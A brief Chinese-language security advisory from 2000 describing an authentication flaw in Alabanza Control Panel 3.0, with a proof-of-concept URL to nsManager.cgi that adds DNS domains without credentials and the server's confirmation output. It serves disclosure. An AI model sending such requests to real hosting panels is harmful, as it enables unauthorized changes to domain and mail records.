Alabanza控制面板域可被修改漏洞发布时间:2000-09-27 更新时间:2000-09-27 严重程度:中 威胁程度:权限提升 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Alabanza Control Panel 3.0 和之前的版本详细描述 Alabanza是一个WEB主机提供程序,可以自动生成虚拟主机,但起域管理程序 存在一个漏洞,可以修改增加和删除域和MX和CNAME记录。问题是对ALABANZA 请求一个特殊的URL请求就可以导致不需要用户和密码来访问管理控制面板。 测试代码 要增加一个域到名字服务器,使用下面的方法: http://target/cp/rac/nsManager.cgi?Domain=<example.com>&IP=<IP address>&OP=add&Language=english&Submit=Confirm 访问下面的URL: http://www.example.com/cp/rac/nsManager.cgi?Domain=HAHAHA.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm 会显示"Name Server Manager Domain example.com will be added within 1 hour! Your domain example.com <IP address> will be setup within 1 hour! Please click here to go back." 这里就可以增加修改域。 解决方案 尚无 相关信息 |
